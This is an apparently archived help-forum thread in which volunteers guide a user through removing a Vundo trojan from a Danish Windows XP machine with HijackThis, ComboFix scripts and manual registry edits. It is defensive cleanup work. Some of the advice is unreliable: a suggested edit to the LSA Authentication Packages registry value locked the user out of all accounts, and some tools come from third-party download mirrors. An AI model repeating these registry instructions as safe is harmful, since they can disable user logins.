to stop persistent malware - do not let teenagers use the PC - do not click on links in email - do not visit dodgy sites (thoses inticing adverts or pops ups - alway click the red cross) . - do not use p2p software such as limewire, bit torrent,bear share,
do not click on links in  msn messenger
0
Evaluating UTMs? Here's what you need to know!

Evaluating a UTM appliance and vendor can prove to be an overwhelming exercise.  How can you make sure that you're getting the security that your organization needs without breaking the bank? Check out our UTM Buyer's Guide for more information on what you should be looking for!

 
rpggamergirlCommented:
The absence of the 02 and 020 lines in Hijackthis is the sign of vundo/conhook infection so I agree with InDiGenus that running Combofix is a good idea and anyway bad files showing in the log can be removed using its CFScript function.

The IP address that's showing there looks very much like a wareout infection and also the symptom you mentioned, so I think it could also a wareout infection.

Try running Fixwareout also.
Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://download.bleepingcomputer.com/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, then make sure "Run fixit" is checked and click Finish. The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

At the end of the fix, you may need to restart your computer again.
0
 
orangutangCommented:
Also, SUPERAntiSpyware (http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE) and remove:
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
0
 
steve0412Author Commented:
I have come to this conclusion, after I discovered a Zatacka icon on the desktop of a user:

Zatacka is a popular arcade-type game. It is available on download from reliable sources such as sourceforge (http://zatacka.sourceforge.net/index.php?id=authors).

My 15-year old daughter enjoys this game, but one day she wanted to play it on another PC here, so she downloaded it, from an unreliable source it seems. Zatacka.exe was a 46kb exe file that installed to the desktop. After she found that nothing happened when she tried to start it, she tried to remove it-she could not.

At about the same time, we started to get a lot of pop-ups from partypoker, statcounter, tradedoubler, 2o7, Clickxchange, Linksynergy, advanced, bizadverts, dk.advancedcleaner, secure.advancedcleaner and zedo. At the same time it seems, the trojan, vundo was installed.

The mechanism seems to be that an XML file, BM870dc8a8, is installed in the Windows directory and run on starting a browser. This came to our attention when web pages stopped loading completely. This XML file calls rundll32.exe, which runs dll's installed in the system32 (names such as 'djshrhsg.dll'.

If you use Hijackthis, or startup monitor to remove the command from the HKLM run section, it immediately clones itself.

The way to remove it is to start Windows in safe mode with command prompt and use the 'DEL' command.

McAfee Security Suite, SpyHunter 3, Spy Eraser or RogueRemover pro did not detect this problem.

Has anyone heard of this before, and do you think I have nailed the problem?

0
 
chilternPCCommented:
best way to 'nail the problem' for the future  is 'limited or No accounts for children!! (or even better their own PCs)  :-)
0
 
IndiGenusCommented:
Yes we have heard of it. It is Vundo/Conhook Trojan and is very (unfortunately) common these days. Combofix and typically a follow up script with it deals with it very nicely. There is even a new variant that infects .exe files, causing start up programs to fail. CF would have also dealt with this nicely.

Dave
0
 
steve0412Author Commented:
Ralph Nader once wrote a book "Unsafe at Any Speed:The Designed-In Dangers of the American Automobile". There should be one called "Unsafe at Any Speed :The Designed-In Dangers of the Internet".
0
 
IndiGenusCommented:
Sorry forgot to mention...no way for us to know if you solved the problem. Have the issues disappeared?

0
 
steve0412Author Commented:
The problem is solved, but I figure that I got there myself. However, I am grateful for the good advice, so I will split the points
0
 
steve0412Author Commented:
I spoke too soon.Opened another user profile and bang! There it is again. I am running combo fix now, but am worried by a instruction conflict  in swreg.cfexe. I have clicked thru and CF is scanning
0
 
steve0412Author Commented:
Please see log and comment?
log.txt
0
 
IndiGenusCommented:
Heavily infected machine...had a "feeling" you would be back, or have to make another post. Give me a little and I'll put a CFScript together for you if you like.

0
 
IndiGenusCommented:
1. Open Notepad.

2. Now copy/paste the text between the lines below into the Notepad window:

---------------------------------------------------------------------------------------------------------------

File::
C:\WINDOWS\system32\bxxogiao.pest
C:\WINDOWS\system32\sslnpilc.pest
C:\WINDOWS\system32\qcsqhaif.pest
C:\WINDOWS\BM870dc8a8.xml
C:\WINDOWS\system32\djjhkdec.pest
C:\WINDOWS\system32\tryjvick.pest
C:\WINDOWS\BM870dc8a8crap2.xml
C:\WINDOWS\system32\lhpyevon.pest
C:\WINDOWS\system32\wecswpwi.pst
C:\WINDOWS\system32\fqrhbddy.pest
C:\WINDOWS\system32\tynlomju.pest
C:\WINDOWS\BM870dc8a8crap.xml
C:\WINDOWS\system32\adubyivx.pest
C:\WINDOWS\system32\ivlrtwlu.pest
C:\WINDOWS\system32\eqqgqcix.pest
C:\WINDOWS\system32\gocjemjp.pest
C:\WINDOWS\system32\gntwwwhr.pest
C:\WINDOWS\system32\pacrbsma.pest
C:\WINDOWS\system32\lfweeymi.pest
C:\WINDOWS\system32\dsfkbpgr.pest
C:\WINDOWS\system32\icxujaoj.pest
C:\WINDOWS\system32\kaprwtgk.pest
C:\WINDOWS\system32\pgtxwmij.pest
C:\WINDOWS\system32\iikfvcsp.pest
C:\WINDOWS\system32\hesrnwym.pest
C:\WINDOWS\system32\lljrmkln.pest      
C:\WINDOWS\system32\nomnvppa.pest
C:\WINDOWS\system32\jbbmbeig.pest
C:\WINDOWS\system32\ncprincn.pest
C:\WINDOWS\system32\eocymiir.pest
C:\WINDOWS\system32\ffmhrwss.pest
C:\WINDOWS\system32\qjitcugg.pest
C:\WINDOWS\system32\sardsvqh.pest
C:\WINDOWS\system32\iifggff.dll
C:\WINDOWS\system32\mljgh.dll

Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\iifggff]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

---------------------------------------------------------------------------------------------------------------

3. Save the above as CFScript.txt on your desktop.

4. Then drag the CFScript.txt into ComboFix.exe. This will start ComboFix again.

5. After reboot, (in case it asks to reboot), please upload the following reports/logs.

-Combofix.txt
-A new HijackThis log ~ From each user account
0
 
steve0412Author Commented:
Before I do that, please be aware that these files have been renamed by me. They were .dll files. Shall I perform the task anyway or should I rename them back to .dll?
0
 
steve0412Author Commented:
actually, it is self-explanatory, so I will perform the task 'as is'
0
 
IndiGenusCommented:
Yes just to confirm "as is". They are all Vundo files. I thought one of the security programs you tried may have renamed them but the extension did look a little funny...

0
 
steve0412Author Commented:
Hi

I followed instructions but nothing happened, so I tried to run combofix and copy the CFScript.txt to the blue window. It has not removed the files. I am includingthe log, script and 5 hijackthis log files.

NB. I had ms Process Explorer installed on this PC. Has combofix removed it?
hijackthis-profile1ap.txt
hijackthis-profile2cp.txt
hijackthis-profile3sp.txt
hijackthis-profile4sm.txt
hijackthis-profile5guest.txt
ComboFix.txt
CFScript.txt
0
 
steve0412Author Commented:
Just a comment (not really to do with the problem in hand, but anyway)
Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!
0
 
IndiGenusCommented:
The script didn't run because you are not running combofix from the desktop. Combofix needs to be put directly on the desktop. Do the same with the script .txt file. Then drag the txt file onto CF... that should do it. Then post the logs...
0
 
steve0412Author Commented:
Combofix is on the desktop, not a shortcut, but where it was installed. If I drag the file in (also on the desktop) , the loading bar starts, a flash of blue screen then nothing (how long do I wait? 20 minutes?)
0
 
rpggamergirlCommented:
Combofix instructions says to run it from the desktop maybe because that's easier, but even IF it wasn't, the CFScript still should work as long is it's in the same location as Combofix.exe, Just wait and let it run even for 20 minutes.


>>>Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!<<<

Tribal Fusion feeds the advertising for EE, and of course EE gets paid for the displaying these ads on their pages, but Premium members don't have these ads.
0
 
IndiGenusCommented:
Forgive my ignorance on this...

This is where cf is located:

C:\Documents and Settings\Anne\Skrivebord\ComboFix.exe

What is Skrivebord? Is it another language for desktop?
0
 
rpggamergirlCommented:
I think Norwegian windows XP Desktop is called --> Skrivebord , :)

And "Escritorio" in Spanish
C:\Documents and Settings\Owner\Escritorio\ComboFix.exe
0
 
IndiGenusCommented:
From your HijackThis logs...this is the only entry I'm seeing as bad. Looks like it's at least partly fixed. You can have Hijackthis fix the item.

O20 - Winlogon Notify: iifggff - iifggff.dll (file missing)

See if that helps.
0
 
steve0412Author Commented:
No Luck wuth dropping the script file on the icon. It starts, but no log is produced, and the files are still there. Can I remove the files manually?
0
 
IndiGenusCommented:
Yes, you can remove the files manually, but there is one registry entry that still is bad.

This, which is bad...
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Authentication Packages      REG_MULTI_SZ         msv1_0 C:\WINDOWS\system32\mljgh.dll

Should be this..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

If you are comfortable editing the registry you can do it manually.
0
 
steve0412Author Commented:
no, I wouldn't know unless it is to replace the current text with the string provided, but I am sure it is not. Is it still a REG_MULTI_SZ? or do I enter the string in binary? Sorry about the lack of knowledge in this department, but I don't want to screw the registry up!!!
0
 
IndiGenusCommented:
First you should back up your registry, especially if you're not comfortable with editing it.

You are going to go to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa key.
When you navigate to "Authentication Packages" under the name heading in your registry, it will be:

Type: REG_MULTI_SZ
Data: msv1_0
0
 
steve0412Author Commented:
Ok, is this a bad joke?

I did as instructed and now Windows is asking me for a log in password for all the accounts on that PC. As no password was set, I am at a loss what to do. I have tried 'administrator' with no avail.

Please advise.
0
 
steve0412Author Commented:
OK, I have recovered the system from the 'last known good etc..'.That was one helluva change in the registry! Now, what do I have to do to the user accounts to make the registry change and not have the same pronlem of totally locked down accounts?
0
 
IndiGenusCommented:
OK? I'm confused on several things here.

1. You are saying that last registry change made this happen?
2. Did you make a backup of the registry before doing the change as I had advised? If so you could have just reverted to that.

That change if done properly should not have caused that to happen and I'm not sure what's going on here.

If you went to Last Known Good Configuration then it should have just brought you back to where you were before.

Is this an english version of XP, or another language? I had commented about the Skriveboard (Desktop) earlier. I'm wondering if that had something to do with it.  
0
 
steve0412Author Commented:
1, Yes, because the only thing changed in the registry was changing the entry as proposed.

2. Yes, I did, and that is why I could recover.

This is Danish XP. When I tried to log on, including the administrator account in Safe mode, it said that I had limited permission. Since I don't run with passwords on that PC (yes - I know -stupid!) there were no passwords to enter. I tried 'admin, administrator, password.

0
 
IndiGenusCommented:
I cannot say for sure but since this pc is Danish maybe the reg entry would be different??? I obviously really only deal with US, as you can tell by the fact that I didn't know what "skriveboard" meant.

Maybe rpg will look in here with a suggestion.
0
 
steve0412Author Commented:
There is still the point of the change in the registry, which blocked access to the user accounts. This may be an issue with language versions (Danish) of Windows XP. I would like to know that I have fully removed the threat and that I am protected in the future.
0
All Courses

From novice to tech pro — start learning today.